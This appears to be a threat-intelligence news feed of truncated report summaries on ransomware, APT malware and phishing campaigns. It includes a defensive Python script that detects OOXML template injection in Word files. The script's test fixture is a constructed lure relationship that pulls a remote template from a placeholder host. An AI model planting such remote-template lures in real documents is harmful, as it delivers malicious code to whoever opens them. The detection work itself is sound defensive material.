Sophos’ postmortem analysis shows LockBit 3.0 (LockBit Black) carries wormable capabilities and borrows heavily from BlackMatter, including tooling used by affiliates and even legitimate pentesters. The investigation highlights evolving self-spread techniques,…
Category: Threat Research
ESET researchers analyzed Dolphin, a previously unreported backdoor used by ScarCruft (APT37) that operatives deploy on select targets to exfiltrate files, log keystrokes, take screenshots, and steal browser credentials, using Google Drive for C2. The Dolphin …
The aviation sector in Southeast Asia faced multiple ransomware incidents targeting airlines in Malaysia, Thailand, Portugal, and Kuwait, linked to several threat actors including Daixin Team, ALPHV (BlackCat), Ragnar Locker, and LockBit. The report outlines …
CRIL uncovered a new Punisher ransomware variant spreading via a COVID-19-themed phishing site that targets Chilean users. The malware uses timestomping, a volume-serial-number-based system ID, and data exfiltration before encryption, with victim-specific deta…
An Emotet-driven intrusion led to domain-wide deployment of Quantum ransomware after eight days, leveraging Cobalt Strike for discovery and lateral movement and remote-access tools for persistence. The operation included initial access via LNK, PowerShell-base…
A malvertising campaign exploiting Black Friday shopping interest redirects Google users searching for Walmart to tech support scam pages, using cloaking and disposable domains to hide malicious intent. Malwarebytes reported the activity to Google, highlightin…
Malware disguised as Word documents is being distributed via KakaoTalk group chats, using Template Injection to pull remote content from cleverly disguised URLs. Users are urged to verify sources and keep Office updated to avoid infection. #Kimsuky #TemplateIn…
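Template injection of the kind described above leaves a concrete artifact in the document package: an OOXML `attachedTemplate` relationship whose target is a remote URL rather than a local template path. The following is an added example, not code from the ASEC report or from the KakaoTalk samples, that unpacks a `.docx`/`.dotx` in memory and flags only remote template targets (HTTP(S), FTP, UNC or `file://` with a non-local host), so that the very common benign case of a document attached to a local `Normal.dotm` is not reported. The two sample packages, the hostname `example.invalid` and the rule names are constructed for the example.

```python
"""Flag Word documents that pull a remote template (OOXML template injection).

Added example, not from the original report. Builds two minimal OOXML packages
in memory (constructed samples) and checks every .rels part for an
attachedTemplate relationship pointing off-host.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "smb", "webdav"}


def is_remote(target: str) -> bool:
    """True if a relationship target would make Word fetch from another host."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True                      # UNC path: \\host\share\x.dotm
    u = urlparse(t)
    if u.scheme.lower() in REMOTE_SCHEMES:
        return True
    if u.scheme.lower() == "file":       # file://host/share is remote, file:///C:/... is not
        return bool(u.netloc) and u.netloc.lower() != "localhost"
    return False


def remote_template_targets(docx_bytes: bytes) -> list[str]:
    """Return every attachedTemplate target in the package that is remote."""
    hits: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue                 # malformed rels part: out of scope for this check
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if is_remote(target):
                    hits.append(target)
    return hits


def build_docx(settings_rels: str) -> bytes:
    """Constructed minimal package containing only the parts this check reads."""
    wns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml", f"<w:document xmlns:w='{wns}'/>")
        z.writestr("word/settings.xml", f"<w:settings xmlns:w='{wns}'/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


# Constructed samples: a lure pulling its template over HTTP, and a normal
# document attached to the user's local Normal.dotm (also TargetMode="External").
MALICIOUS_RELS = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://example.invalid/lure.dotm" TargetMode="External"/>
</Relationships>"""

BENIGN_RELS = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file:///C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    print("lure:", remote_template_targets(build_docx(MALICIOUS_RELS)))
    print("normal doc:", remote_template_targets(build_docx(BENIGN_RELS)))
```

Checking `TargetMode="External"` alone is not enough: Word writes local template attachments with that mode too, so the distinguishing signal is the scheme and host of the target. The check reads only the relationship parts, so it works on password-free packages regardless of whether the body of `document.xml` is itself obfuscated.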
An ASEC analysis highlights a password-protected Word document disguised as a CNA Singapore interview (filename CNA[Q].doc) used to target North Korea-related information and leak credentials via FTP. The embedded VBA macro auto-executes, creates and runs a VB…
FortiGuard Labs analyzes Cryptonite, an open-source, Python-based ransomware kit that encrypts Windows files and uses ngrok as a reverse proxy for C2. The report details how Cryptonite operates, its encryption method, IoCs, and Fortinet’s protective guidance a…
ThreatLabz notes a spike in fake FIFA World Cup 2022 streaming sites and related scams that lure fans via newly registered domains and fake links to harvest credentials or payment details. The campaign mix includes World Cup ticket and lottery scams, fake crac…
Fortinet FortiGuard Labs highlights two Black Friday-themed scams: a reused decoy PDF phishing lure and a typosquatting scheme that redirects shoppers to fake sites and surveys. The report also covers a Chrome-based PUA named Chromnius, protection recommendati…
Koxic ransomware is being observed in Korea, with samples adding the .KOXIC_[random string] extension and generating a per-directory ransom note named WANNA_RECOVER_KOXIC_FILEZ_[Random string]. The campaign features UPX Trick obfuscation, Defender avoidance, a…
Wiki ransomware, identified by ASEC, is a variant of Crysis that is distributed disguised as a normal program and encrypts files. It uses persistence, process termination, and shadow-copy deletion to hinder recovery, with distribution commonly linked to RDP environme…
Check Point Research warns of a sharp rise in fake shopping-related sites and phishing campaigns ahead of Black Friday, including impersonation of Louis Vuitton and DHL delivery scams. The report highlights lookalike domains, malicious emails, and delivery-the…
Cybereason’s Global SOC is tracking a wide Black Basta ransomware campaign that leverages QakBot (QBot) to gain entry and move laterally in U.S.-based organizations. The campaign ties QakBot infections to rapid deployment of Black Basta, including DNS disrup…